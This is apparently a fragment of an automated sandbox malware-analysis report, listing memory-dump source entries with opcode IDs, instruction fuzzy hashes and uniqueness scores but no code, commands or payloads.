                                                                                                                                                                                                                                            • Source File: 00000004.00000002.397974751.0000000001620000.00000040.00000800.00020000.00000000.sdmp, Offset: 01620000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_1620000_bvr38xq.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: b37e57b1e7d1a0ab41c31e2df7a31f5f4fc5f117f46ba41ed5914bde65662b0d
                                                                                                                                                                                                                                            • Instruction ID: cd8a8d88c44f8708b32f9c7083e92609c948cf718ed424ccc4ee09d997a8baa7
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b37e57b1e7d1a0ab41c31e2df7a31f5f4fc5f117f46ba41ed5914bde65662b0d
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1FD012726043286B4748EAA994545DEBFEDCA94270B1140AED90DD7240EDB12A4042DD
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000004.00000002.397974751.0000000001620000.00000040.00000800.00020000.00000000.sdmp, Offset: 01620000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_1620000_bvr38xq.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 5043a10ba3d722c85aff666402c5c3f1b98bd28ff9f43ba5f1e5de2058e42c43
                                                                                                                                                                                                                                            • Instruction ID: b60c2c3ec15f55bacea7240d8841bf70f14de9ccef2f2d199ae2664f680ad8ca
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5043a10ba3d722c85aff666402c5c3f1b98bd28ff9f43ba5f1e5de2058e42c43
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9BC08030416309DFC720AFECB40C72D7F6CE703711F405694D50853204D7714400C765
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000004.00000002.397974751.0000000001620000.00000040.00000800.00020000.00000000.sdmp, Offset: 01620000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_1620000_bvr38xq.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: bf81d6e8626c98955923d90005f7ec899d15137b314f5ea82be49f64a0b67b62
                                                                                                                                                                                                                                            • Instruction ID: 9fe68578960da7fa5beda8faa40f395ae2f4455b935a7dd9edeae13dbd261aa1
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bf81d6e8626c98955923d90005f7ec899d15137b314f5ea82be49f64a0b67b62
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3AC00236260208EFCB41EF99D844C557BB9BF59B147509099FA454F631C732E921EB50
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000004.00000002.397974751.0000000001620000.00000040.00000800.00020000.00000000.sdmp, Offset: 01620000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_1620000_bvr38xq.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 0b340eca081ef34c2e5c73bff244c2e1be51782e90d269fbb23c3146e761beb3
                                                                                                                                                                                                                                            • Instruction ID: f376b302d2e76c899bd55ddc1c227d6ac31ba1257c00dbb30ec6ab62a19e87f6
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0b340eca081ef34c2e5c73bff244c2e1be51782e90d269fbb23c3146e761beb3
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BBB09B737145340B45409268795559C7571A6501A53D55856D14AE5B50DD108412969C
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000004.00000002.397974751.0000000001620000.00000040.00000800.00020000.00000000.sdmp, Offset: 01620000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_1620000_bvr38xq.jbxd
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%